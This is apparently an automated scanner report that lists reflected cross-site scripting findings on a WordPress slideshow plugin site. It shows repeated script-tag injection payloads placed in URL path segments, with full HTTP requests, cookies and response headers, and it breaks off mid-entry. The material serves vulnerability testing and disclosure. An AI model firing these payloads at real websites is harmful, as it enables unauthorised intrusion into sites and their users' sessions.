HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:22:42 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674562+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674562; expires=Thu, 02-Feb-2012 19:22:42 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:22:42 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53338
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eae35"><script>alert(1)</script>8c6c868a5fe was submitted in the REST URL parameter 2. This input was echoed as eae35\"><script>alert(1)</script>8c6c868a5fe in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-contenteae35"><script>alert(1)</script>8c6c868a5fe/plugins/superslider-show/js/slideshow.js HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:22:43 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674563+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674564; expires=Thu, 02-Feb-2012 19:22:44 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:22:44 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53338
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 553e1"><script>alert(1)</script>04e840362be was submitted in the REST URL parameter 3. This input was echoed as 553e1\"><script>alert(1)</script>04e840362be in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins553e1"><script>alert(1)</script>04e840362be/superslider-show/js/slideshow.js HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:22:45 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674566+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674566; expires=Thu, 02-Feb-2012 19:22:46 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:22:46 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53338
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8abcc"><script>alert(1)</script>ee5f31f45bb was submitted in the REST URL parameter 4. This input was echoed as 8abcc\"><script>alert(1)</script>ee5f31f45bb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider-show8abcc"><script>alert(1)</script>ee5f31f45bb/js/slideshow.js HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:22:47 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674568+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674569; expires=Thu, 02-Feb-2012 19:22:49 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:22:49 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53338
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f2e98"><script>alert(1)</script>2c612aa2c9c was submitted in the REST URL parameter 5. This input was echoed as f2e98\"><script>alert(1)</script>2c612aa2c9c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider-show/jsf2e98"><script>alert(1)</script>2c612aa2c9c/slideshow.js HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:22:50 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674570+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674571; expires=Thu, 02-Feb-2012 19:22:51 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:22:51 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53338
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e8b9"><script>alert(1)</script>c2af7f63bf8 was submitted in the REST URL parameter 6. This input was echoed as 9e8b9\"><script>alert(1)</script>c2af7f63bf8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider-show/js/slideshow.js9e8b9"><script>alert(1)</script>c2af7f63bf8 HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:22:52 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674573+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674573; expires=Thu, 02-Feb-2012 19:22:53 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:22:53 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53338
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fa93b"><script>alert(1)</script>da1c1d240d4 was submitted in the REST URL parameter 1. This input was echoed as fa93b\"><script>alert(1)</script>da1c1d240d4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sitefa93b"><script>alert(1)</script>da1c1d240d4/wp-content/plugins/superslider-show/js/slimbox.js HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:22:54 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674574+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674575; expires=Thu, 02-Feb-2012 19:22:55 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:22:55 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53332
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 902a8"><script>alert(1)</script>5782793370 was submitted in the REST URL parameter 2. This input was echoed as 902a8\"><script>alert(1)</script>5782793370 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content902a8"><script>alert(1)</script>5782793370/plugins/superslider-show/js/slimbox.js HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:22:58 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674578+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674578; expires=Thu, 02-Feb-2012 19:22:58 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:22:58 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53329
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd602"><script>alert(1)</script>efee82710e was submitted in the REST URL parameter 3. This input was echoed as cd602\"><script>alert(1)</script>efee82710e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/pluginscd602"><script>alert(1)</script>efee82710e/superslider-show/js/slimbox.js HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:22:59 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674579+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674580; expires=Thu, 02-Feb-2012 19:23:00 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:23:00 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53330
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 32cfb"><script>alert(1)</script>2790aaf3378 was submitted in the REST URL parameter 4. This input was echoed as 32cfb\"><script>alert(1)</script>2790aaf3378 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider-show32cfb"><script>alert(1)</script>2790aaf3378/js/slimbox.js HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:23:01 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674581+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674581; expires=Thu, 02-Feb-2012 19:23:01 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:23:01 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53332
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e12e6"><script>alert(1)</script>f6e7648297d was submitted in the REST URL parameter 5. This input was echoed as e12e6\"><script>alert(1)</script>f6e7648297d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider-show/jse12e6"><script>alert(1)</script>f6e7648297d/slimbox.js HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:23:03 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674583+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674583; expires=Thu, 02-Feb-2012 19:23:03 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:23:03 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53333
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 59b1e"><script>alert(1)</script>7e580d589db was submitted in the REST URL parameter 6. This input was echoed as 59b1e\"><script>alert(1)</script>7e580d589db in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider-show/js/slimbox.js59b1e"><script>alert(1)</script>7e580d589db HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:23:04 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674584+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674585; expires=Thu, 02-Feb-2012 19:23:05 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:23:05 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53332
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 55536"><script>alert(1)</script>160905c159f was submitted in the REST URL parameter 1. This input was echoed as 55536\"><script>alert(1)</script>160905c159f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site55536"><script>alert(1)</script>160905c159f/wp-content/plugins/superslider-show/plugin-data/superslider/ssShow/default/default.css HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:22:40 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674560+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674560; expires=Thu, 02-Feb-2012 19:22:40 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:22:40 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53443
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aac9e"><script>alert(1)</script>d90ed1acbd5 was submitted in the REST URL parameter 2. This input was echoed as aac9e\"><script>alert(1)</script>d90ed1acbd5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-contentaac9e"><script>alert(1)</script>d90ed1acbd5/plugins/superslider-show/plugin-data/superslider/ssShow/default/default.css HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:22:42 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674562+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674562; expires=Thu, 02-Feb-2012 19:22:42 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:22:42 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53443
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8332"><script>alert(1)</script>7ad48b4bc3b was submitted in the REST URL parameter 3. This input was echoed as a8332\"><script>alert(1)</script>7ad48b4bc3b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/pluginsa8332"><script>alert(1)</script>7ad48b4bc3b/superslider-show/plugin-data/superslider/ssShow/default/default.css HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:22:43 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674564+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674564; expires=Thu, 02-Feb-2012 19:22:44 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:22:44 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53443
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a062d"><script>alert(1)</script>5479a44adae was submitted in the REST URL parameter 4. This input was echoed as a062d\"><script>alert(1)</script>5479a44adae in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
